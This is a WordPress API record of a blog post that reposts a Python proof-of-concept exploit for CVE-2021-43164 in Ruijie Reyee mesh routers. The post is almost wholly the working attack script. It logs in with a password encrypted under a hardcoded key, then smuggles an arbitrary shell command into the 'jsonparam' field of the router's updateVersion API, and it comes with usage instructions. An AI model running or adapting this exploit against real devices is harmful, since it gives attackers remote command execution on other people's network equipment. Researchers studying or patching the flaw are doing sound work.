{"id":24339,"date":"2022-05-11T23:18:57","date_gmt":"2022-05-11T19:18:57","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167099\/ruijiereyeemr-exec.txt"},"modified":"2022-05-15T09:39:37","modified_gmt":"2022-05-15T05:09:37","slug":"ruijie-reyee-mesh-router-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/ruijie-reyee-mesh-router-remote-code-execution\/","title":{"rendered":"Ruijie Reyee Mesh Router Remote Code Execution"},"content":{"rendered":"

# Exploit Title: Ruijie Reyee Mesh Router – Remote Code Execution (RCE) (Authenticated)
\n# Google Dork: None
\n# Date: November 1, 2021
\n# Exploit Author: Minh Khoa of VSEC
\n# Vendor Homepage: https:\/\/ruijienetworks.com
\n# Software Link: https:\/\/www.ruijienetworks.com\/resources\/products\/1896-1900
\n# Version: ReyeeOS 1.55.1915 – EW_3.0(1)B11P35 and EW_3.0(1)B11P55
\n# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
\n# CVE: CVE-2021-43164<\/p>\n

#!\/usr\/bin\/python3<\/p>\n

import os
\nimport sys
\nimport time
\nimport requests
\nimport json<\/p>\n

def enc(PASS):
\nkey = “RjYkhwzx$2018!”
\nshell = “echo ‘{}’ | openssl enc -aes-256-cbc -a -k ‘{}’ -md md5 2>\/dev\/null”.format(PASS, key)
\nreturn os.popen(shell).read().strip()<\/p>\n

try:
\nTARGET = sys.argv[1]\nUSER = sys.argv[2]\nPASS = sys.argv[3]\nCOMMAND = sys.argv[4]\nexcept Exception:
\nprint(“CVE-2021-43164 PoC”)
\nprint(“Usage: python3 exploit.py <target> <user> <pass> <command>”)
\nprint(“Example: python3 exploit.py 192.168.110.1 admin password ‘touch \/tmp\/pwned'”)
\nsys.exit(1)<\/p>\n

endpoint = “http:\/\/{}\/cgi-bin\/luci\/api\/auth”.format(TARGET)
\npayload = {
\n“method”: “login”,
\n“params”: {
\n“username”: USER,
\n“password”: enc(PASS),
\n“encry”: True,
\n“time”: int(time.time()),
\n“limit”: False
\n}
\n}<\/p>\n

r = requests.post(endpoint, json=payload)
\nsid = json.loads(r.text)[“data”][“sid”]\n

endpoint = “http:\/\/{}\/cgi-bin\/luci\/api\/wireless?auth={}”.format(TARGET, sid)
\npayload = {
\n“method”: “updateVersion”,
\n“params”: {
\n“jsonparam”: “‘; {} #”.format(COMMAND)
\n}
\n}<\/p>\n

r = requests.post(endpoint, json=payload)
\nprint(r.text)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Ruijie Reyee Mesh Router – Remote Code Execution (RCE) (Authenticated) # Google Dork: None # Date: November 1, 2021 # Exploit Author: Minh Khoa of VSEC # Vendor Homepage: https:\/\/ruijienetworks.com # Software Link: https:\/\/www.ruijienetworks.com\/resources\/products\/1896-1900 # Version: ReyeeOS 1.55.1915 – EW_3.0(1)B11P35 and EW_3.0(1)B11P55 # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO # CVE: …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-24339","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24339","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=24339"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24339\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=24339"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=24339"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=24339"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}